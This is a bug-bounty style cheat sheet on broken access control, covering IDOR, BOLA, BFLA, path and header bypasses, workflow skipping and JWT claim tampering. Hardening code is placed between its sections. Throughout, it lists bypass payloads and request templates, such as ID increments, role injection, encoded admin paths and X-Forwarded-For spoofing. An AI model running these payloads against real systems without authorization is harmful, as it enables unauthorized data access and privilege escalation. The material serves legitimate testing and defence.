
Access Control

Broken access control, IDOR, privilege escalation, and authorization bypass

Horizontal Privilege Escalation

IDOR (Insecure Direct Object Reference)

TEXT
# Numeric ID
GET /api/users/123/profile → GET /api/users/124/profile

# UUID (try sequential or guessable)
GET /api/orders/a1b2c3d4... → GET /api/orders/a1b2c3d5...

# Encoded ID
GET /api/users/MTIz (base64: 123) → GET /api/users/MTI0 (124)

# Hashed ID
Look for predictable patterns, weak hashes
MD5(123) → try MD5(124)
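Defender-side counterpart to the ID patterns above, added here as an example (not part of the original cheat sheet): a small detector that parses constructed access-log lines and flags sessions that walk through adjacent object IDs. The log format, the route regex and the thresholds are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access log (session, method, path, status); not real data.
SAMPLE_LOG = """\
sess-A GET /api/users/123/profile 200
sess-A GET /api/users/124/profile 200
sess-A GET /api/users/125/profile 403
sess-A GET /api/users/126/profile 403
sess-A GET /api/users/127/profile 200
sess-B GET /api/users/500/profile 200
sess-B GET /api/users/500/orders 200
sess-C GET /api/users/900/profile 200
sess-C GET /api/users/42/profile 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})$")
OBJECT_RE = re.compile(r"^/api/users/(\d+)/")   # the object ID this route exposes


def parse_log(text):
    """Return (session, method, path, status) tuples; non-matching lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append((m.group(1), m.group(2), m.group(3), int(m.group(4))))
    return rows


def ids_per_session(rows):
    """Distinct object IDs each session touched, plus how many of those requests were denied."""
    ids = defaultdict(set)
    denied = defaultdict(int)
    for sess, _method, path, status in rows:
        m = OBJECT_RE.match(path)
        if not m:
            continue
        ids[sess].add(int(m.group(1)))
        if status == 403:
            denied[sess] += 1
    return ids, denied


def flag_enumeration(rows, min_distinct=3, min_sequential_ratio=0.5):
    """Flag sessions that touched several distinct IDs which are mostly adjacent.

    A legitimate user rarely reads profiles 123, 124, 125, ... in turn; a scan does.
    Thresholds are assumptions and should be tuned per application.
    """
    ids, denied = ids_per_session(rows)
    flagged = {}
    for sess, seen in ids.items():
        if len(seen) < min_distinct:
            continue
        ordered = sorted(seen)
        steps = [b - a for a, b in zip(ordered, ordered[1:])]
        ratio = sum(1 for s in steps if s == 1) / len(steps)
        if ratio >= min_sequential_ratio:
            flagged[sess] = {"distinct_ids": len(seen), "sequential_ratio": ratio,
                             "denied": denied[sess]}
    return flagged
```

For base64 or hashed IDs the same logic applies once the ID is decoded at ingestion; where the ID cannot be decoded, the count of distinct IDs per session combined with the 403 count is the weaker but still useful signal.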

Parameter Manipulation

TEXT
# Body parameter
POST /update-profile
{"user_id": "123"} → {"user_id": "456"}

# Cookie-based
Cookie: user=john → Cookie: user=admin

# Header-based
X-User-ID: 123 → X-User-ID: 456

Reference Switching

TEXT
# Multiple parameters
GET /api/account?user=123&account=456
→ Try user=124&account=456
→ Try user=123&account=457

# Different ID types
GET /document?doc_id=100&owner_id=50
→ Change doc_id AND owner_id
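What the server should do with every ID in the IDOR, parameter-manipulation and reference-switching requests above, added as an example (not the cheat sheet's own code): the authenticated session, not the request, decides whose objects may be read, and every referenced object is checked, not just one of them. The in-memory store, the `Session` type and the base64 handling are assumptions. The same check belongs in a GraphQL `user(id:)` resolver.

```python
import base64
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    user_id: int          # established by authentication, never by a request parameter


# Constructed in-memory store: object -> owner. Stands in for the database.
PROFILES = {123: {"owner": 123, "email": "a@example.com"},
            124: {"owner": 124, "email": "b@example.com"}}
ACCOUNTS = {456: {"owner": 123, "balance": 10},
            457: {"owner": 124, "balance": 99}}


class Forbidden(Exception):
    pass


def decode_object_id(raw):
    """Accept the plain and base64 forms from the page. The encoding is
    cosmetic: the ownership check below does not depend on it."""
    if raw.isdigit():
        return int(raw)
    try:
        decoded = base64.b64decode(raw, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        raise ValueError("unparseable object id")
    if not decoded.isdigit():
        raise ValueError("unparseable object id")
    return int(decoded)


def get_profile_vulnerable(session, raw_user_id):
    # Authenticated, but whatever ID the client sends is served: classic IDOR.
    return PROFILES[decode_object_id(raw_user_id)]


def get_profile_hardened(session, raw_user_id):
    # Look the object up, then compare its owner with the authenticated user.
    # Missing and foreign objects get the same answer so IDs cannot be probed.
    obj = PROFILES.get(decode_object_id(raw_user_id))
    if obj is None or obj["owner"] != session.user_id:
        raise Forbidden()
    return obj


def get_account_hardened(session, raw_user_id, raw_account_id):
    # Reference switching: every referenced object must belong to the caller,
    # so user=124&account=456 and user=123&account=457 both fail.
    user_id = decode_object_id(raw_user_id)
    account = ACCOUNTS.get(decode_object_id(raw_account_id))
    if user_id != session.user_id or account is None or account["owner"] != user_id:
        raise Forbidden()
    return account


def denied(fn, *args):
    """True if the call is refused (used to check the handlers above)."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False
```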

Vertical Privilege Escalation

Role Manipulation

TEXT
# Hidden role parameter
POST /register
{"username": "test", "role": "user"}
→ {"username": "test", "role": "admin"}

# Header-based
X-Role: user → X-Role: admin
X-Admin: false → X-Admin: true
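The server-side fix for the hidden role parameter and the role headers above, added as an example (not from the page): registration binds only an allow-list of fields and the role is assigned by the server; the role for a request comes from the server-side session, never from a header. Field names and the session store are assumptions.

```python
ALLOWED_REGISTRATION_FIELDS = frozenset({"username", "email", "password"})
DEFAULT_ROLE = "user"


def register_vulnerable(payload):
    """Mass assignment: every client-supplied key lands in the user record,
    so {"role": "admin"} or {"is_admin": true} in the body is stored as sent."""
    user = {"role": DEFAULT_ROLE}
    user.update(payload)
    return user


def register_hardened(payload):
    """Only allow-listed fields cross the trust boundary; privilege fields are
    set server-side. Returns the record and the rejected keys (worth logging:
    a client that sends "role" on sign-up is probing)."""
    user = {k: payload[k] for k in ALLOWED_REGISTRATION_FIELDS if k in payload}
    user["role"] = DEFAULT_ROLE
    rejected = sorted(set(payload) - ALLOWED_REGISTRATION_FIELDS)
    return user, rejected


# Constructed server-side session store. The role for a request comes from
# here, keyed by the session cookie; X-Role / X-Admin headers are never read.
SESSION_ROLES = {"sess-1": "user", "sess-2": "admin"}


def role_for_request(session_id, headers):
    """Headers are accepted as an argument only to make the point that they
    play no part in the result."""
    del headers
    return SESSION_ROLES.get(session_id, "anonymous")
```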

Admin Path Access

TEXT
# Direct access
/admin
/admin/dashboard
/administrator
/manage
/management
/admin.php
/admin/users
/api/admin/users

# With ID bruteforce
/admin/user/1
/admin/user/2
...

Function-Level Bypass

TEXT
# Change request method
GET /admin/delete-user → Blocked
POST /admin/delete-user → Allowed?

# Add parameters
GET /admin → 403
GET /admin?debug=1 → 200?
GET /admin?admin=true → 200?

BOLA (Broken Object Level Authorization)

API Testing

TEXT
# Get your own resource
GET /api/v1/users/YOUR_ID/orders/1001

# Access other user's resource
GET /api/v1/users/OTHER_ID/orders/1001
GET /api/v1/users/YOUR_ID/orders/1002  # Other user's order

GraphQL BOLA

GRAPHQL
# Query other user's data
query {
  user(id: "OTHER_USER_ID") {
    email
    orders {
      id
      total
    }
  }
}

BFLA (Broken Function Level Authorization)

Admin Function Access

TEXT
# Regular endpoint
GET /api/v1/users/123

# Admin function
DELETE /api/v1/users/123
PUT /api/v1/users/123/role {"role": "admin"}
POST /api/v1/users/123/reset-password

API Version Switching

TEXT
# Newer version may have restrictions
GET /api/v2/admin/users → 403

# Try older version
GET /api/v1/admin/users → 200
GET /api/admin/users → 200

Bypass Techniques

URL Manipulation

TEXT
# Case variation
/admin → 403
/Admin → 200?
/ADMIN → 200?
/aDmIn → 200?

# Path traversal
/user/profile → allowed
/admin/../user/profile → allowed (reveals admin)
/./admin → 200?
//admin → 200?

# Encoded
/admin → 403
/%61dmin → 200?
/admin%00 → 200?
/admin%20 → 200?
/admin%09 → 200?

HTTP Method Bypass

TEXT
# Method override headers
X-HTTP-Method-Override: DELETE
X-Method-Override: PUT
X-HTTP-Method: PATCH

# Method switching
GET /admin/delete → 403
POST /admin/delete → 200?
PUT /admin/delete → 200?
TRACE /admin/delete → 200?
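One authorization chokepoint that closes the Function-Level Bypass, Admin Function Access, API Version Switching, URL Manipulation and HTTP Method Bypass cases above, added as an example (not the page's code): the path is canonicalised before any decision, the admin rule is prefix-based across API versions and methods, operation-level rules are deny-by-default, and a method override header is resolved before the check rather than after it. Route patterns, role names and the override header handling are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

ROLE_RANK = {"anonymous": 0, "user": 1, "admin": 2}

# Any admin area, whatever the API version prefix (/admin, /api/admin, /api/v1/admin...).
ADMIN_AREA = re.compile(r"^/(api/(v\d+/)?)?(admin|administrator|manage|management)(/|\.|$)")

# BFLA rules: same resource, different operations, different required roles.
# Methods not listed for a matching route are refused, not quietly allowed.
OPERATION_RULES = [
    (re.compile(r"^/api/v\d+/users/\d+$"), {"GET": "user", "DELETE": "admin", "PUT": "admin"}),
    (re.compile(r"^/api/v\d+/users/\d+/role$"), {"PUT": "admin"}),
    (re.compile(r"^/api/v\d+/users/\d+/reset-password$"), {"POST": "admin"}),
]


def normalize_path(raw):
    """Canonical form of a request path, or None if it cannot be made canonical.

    Decoding comes first so /%61dmin and /admin are the same string; control
    characters (NUL, tab, CR/LF) are rejected outright rather than stripped;
    whitespace, repeated slashes, dot segments and letter case are folded.
    """
    path = raw.split("?", 1)[0].split("#", 1)[0]
    for _ in range(3):                       # undo (possibly double) percent-encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        return None                          # still changing after 3 rounds: refuse
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in path):
        return None
    path = re.sub(r"/{2,}", "/", path.strip(" "))
    path = posixpath.normpath(path)
    if not path.startswith("/"):
        path = "/" + path
    return path.lower()


def required_role(method, path):
    """Role needed for (method, canonical path); None means refuse outright."""
    if path is None:
        return None
    if ADMIN_AREA.match(path):
        return "admin"                       # any method, any version, any override
    for pattern, methods in OPERATION_RULES:
        if pattern.match(path):
            return methods.get(method)       # unknown method on a known route: refuse
    return "user"                            # everything else needs a login


def authorize(method, raw_path, headers, role):
    """Single decision point. If the framework honours method override headers,
    the decision must see the effective method, so it is resolved here first."""
    effective = headers.get("X-HTTP-Method-Override", method).upper()
    need = required_role(effective, normalize_path(raw_path))
    if need is None:
        return False
    return ROLE_RANK.get(role, 0) >= ROLE_RANK[need]
```

Note that `/admin/../user/profile` canonicalises to `/user/profile` and is allowed for a normal user, which is correct; what the canonicalisation prevents is the reverse, a path that reaches the admin area while a string-compare on the raw path says it does not.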

Header Manipulation

TEXT
# IP spoofing
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1

# Custom headers
X-Custom-IP-Authorization: 127.0.0.1
X-Original-URL: /admin
X-Rewrite-URL: /admin
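Why those headers work and how to stop them, added as an example (not from the page): forwarding headers are honoured only when the TCP peer is a trusted proxy, and then by walking the X-Forwarded-For chain from the right past trusted hops; X-Original-URL and X-Rewrite-URL are dropped unless they come from the front end. The proxy network is a constructed assumption.

```python
import ipaddress

# Constructed: only these reverse proxies may set forwarding/rewrite headers.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]


def _is_trusted(addr):
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr, headers):
    """IP an access decision may rely on.

    The TCP peer is the only value the client cannot choose. X-Forwarded-For is
    consulted only when that peer is a trusted proxy, and then read from the
    right: each trusted hop appended its own peer, so the first untrusted
    address from the right is the client; everything left of it is client-set.
    """
    if not _is_trusted(remote_addr):
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if _is_trusted(hop):
            continue
        try:
            return str(ipaddress.ip_address(hop))
        except ValueError:
            break                    # garbage in the chain: fall back to the peer
    return remote_addr


def effective_path(request_path, remote_addr, headers):
    """X-Original-URL / X-Rewrite-URL mean something only from the front end
    that sets them; from any other peer they are ignored. Whatever path comes
    out of here still goes through the normal authorization check."""
    if _is_trusted(remote_addr):
        return headers.get("X-Original-URL") or headers.get("X-Rewrite-URL") or request_path
    return request_path


def is_loopback_client(remote_addr, headers):
    """What an 'internal only' check should ask; X-Real-IP, X-Client-IP and
    the other client-set variants never enter the decision."""
    return ipaddress.ip_address(client_ip(remote_addr, headers)).is_loopback
```

The Referer header in the next section is in the same category: it is set by the client and is at most a hint for analytics, never an input to an access decision.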

Referer Check Bypass

TEXT
Referer: https://target.com/admin
Referer: https://target.com/allowed-page
# Remove Referer header entirely

Multi-Step Process Attacks

Skip Steps

TEXT
# Normal flow
Step 1: /checkout/address → Step 2: /checkout/payment → Step 3: /checkout/confirm

# Skip to
/checkout/confirm (skip payment)
/checkout/complete?order_id=123

Parameter Modification Mid-Flow

TEXT
# Step 1: Select item
POST /cart/add {"item_id": 1, "price": 100}

# Step 2: Checkout (modify price)
POST /checkout {"item_id": 1, "price": 1}
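Server-side enforcement for both multi-step patterns above, added as an example (not from the page): checkout state is kept on the server and each step is reachable only from the one before it, and the price is recomputed from a catalogue at every step so a client-supplied `price` is never read. The catalogue, step names and payload shapes are constructed.

```python
from enum import Enum


class Step(Enum):
    CART = "cart"
    ADDRESS = "address"
    PAYMENT = "payment"
    CONFIRM = "confirm"
    COMPLETE = "complete"


FLOW = [Step.CART, Step.ADDRESS, Step.PAYMENT, Step.CONFIRM, Step.COMPLETE]

# Constructed server-side catalogue: the only source of prices.
CATALOG = {1: 100, 2: 250}


class FlowError(Exception):
    pass


class Checkout:
    """Checkout state lives here, keyed by the authenticated owner; the client
    only ever sends step requests, never the state itself."""

    def __init__(self, owner_id):
        self.owner_id = owner_id
        self.step = Step.CART
        self.items = {}
        self.paid = 0

    def _advance(self, target):
        # A step is reachable only from the step immediately before it, so
        # /checkout/confirm without /checkout/payment is refused.
        if FLOW.index(target) != FLOW.index(self.step) + 1:
            raise FlowError(f"{target.value} not reachable from {self.step.value}")
        self.step = target

    def add_item(self, item_id, quantity=1):
        if self.step is not Step.CART:
            raise FlowError("cart is locked once the address step has started")
        if item_id not in CATALOG or quantity < 1:
            raise FlowError("unknown item or bad quantity")
        self.items[item_id] = self.items.get(item_id, 0) + quantity

    def total(self):
        # Always recomputed from the catalogue; nothing the client sent is used.
        return sum(CATALOG[i] * q for i, q in self.items.items())

    def set_address(self, address):
        self._advance(Step.ADDRESS)
        self.address = address

    def pay(self, amount_charged):
        # amount_charged is what the payment provider reports; it is compared
        # with the server total before the state moves on.
        if amount_charged != self.total():
            raise FlowError("charged amount does not match order total")
        self._advance(Step.PAYMENT)
        self.paid = amount_charged

    def confirm(self):
        self._advance(Step.CONFIRM)

    def complete(self, requester_id):
        if requester_id != self.owner_id:
            raise FlowError("not the order owner")
        self._advance(Step.COMPLETE)
        return {"order_total": self.total(), "paid": self.paid}


def handle_cart_add(checkout, payload):
    """Handler for POST /cart/add: only item_id and quantity are read from the
    body; a "price" key is ignored whatever it says."""
    checkout.add_item(int(payload["item_id"]), int(payload.get("quantity", 1)))
    return {"total": checkout.total()}


def fails(fn, *args):
    """True if the step is refused (used to check the flow above)."""
    try:
        fn(*args)
    except FlowError:
        return True
    return False
```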

JWT/Token Attacks

Token Substitution

TEXT
# Steal/generate token for user A
# Use for user B's resources
Authorization: Bearer <token_user_a>
GET /api/users/B/profile

Claims Manipulation

JSON
// Original
{"user_id": "123", "role": "user"}

// Modified
{"user_id": "456", "role": "admin"}
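Why the claim edit above, and the token substitution before it, must fail on a correctly built server, added as an example (not the page's code): an HS256 token is verified before any claim is read, the algorithm is pinned server-side so an `alg: none` header is refused, and the verified subject is compared with the user ID in the URL. The secret, the claim names and the helper names are assumptions.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret-not-for-reuse"   # would come from a KMS/env in practice


def _b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_header(alg):
    return _b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())


class Unauthorized(Exception):
    pass


def issue_token(claims, secret=SECRET):
    """Mint an HS256 JWT for the given claims (server side only)."""
    header = encode_header("HS256")
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_token(token, secret=SECRET):
    """Return the claims only after the signature checks out.

    The expected algorithm is fixed by the server, not read from the token, so
    a header of alg=none or a different algorithm is refused before any
    signature math. The compare is constant-time.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise Unauthorized("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        signature = _b64url_decode(sig_b64)
    except ValueError:
        raise Unauthorized("malformed token")
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise Unauthorized("unexpected alg")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        raise Unauthorized("bad signature")
    return json.loads(_b64url_decode(payload_b64))


def with_claims_replaced(token, claims):
    """Re-encode the payload but keep the old signature: the edited token from
    the page, built only to show that verify_token refuses it."""
    header_b64, _, sig_b64 = token.split(".")
    return f"{header_b64}.{_b64url_encode(json.dumps(claims).encode())}.{sig_b64}"


def authorize_profile_request(token, url_user_id):
    """GET /api/users/<url_user_id>/profile: a valid token for user A is not
    enough; its subject must be the user whose resource is requested."""
    claims = verify_token(token)
    if str(claims.get("sub")) != str(url_user_id):
        raise Unauthorized("token subject does not match requested resource")
    return claims


def rejected(fn, *args):
    """True if the call is refused (used to check the functions above)."""
    try:
        fn(*args)
    except Unauthorized:
        return True
    return False
```

In production the same shape applies with a JWT library: pass the expected algorithm list explicitly, verify before reading any claim, and compare the subject to the resource owner in the handler.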

Testing Checklist

Horizontal Access

TEXT
□ Change user ID in URLs
□ Change user ID in request body
□ Change user ID in cookies
□ Test GUID/UUID prediction
□ Test encoded/hashed IDs
□ Test numeric ID increment/decrement

Vertical Access

TEXT
□ Access admin paths directly
□ Add role parameter to requests
□ Try HTTP method switching
□ Test API version downgrade
□ Access admin functions as regular user
□ Modify role-based claims in tokens

General

TEXT
□ Test with unauthenticated requests
□ Test with different user sessions
□ Try URL encoding bypasses
□ Try header-based bypasses
□ Test multi-step workflow skipping

Bug Bounty Tips

High-Value Targets

TEXT
- User profile/settings endpoints
- Order/transaction history
- Admin panels and dashboards
- API endpoints with ID parameters
- File download/view endpoints
- Report/export generation

Impact Demonstration

TEXT
1. Access other user's PII
2. Modify other user's data
3. Escalate to admin
4. Access paid features free
5. Delete other user's resources

Reporting

TEXT
- Show specific IDOR with two accounts
- Demonstrate data accessed
- Calculate scope (how many users affected)
- Show privilege level difference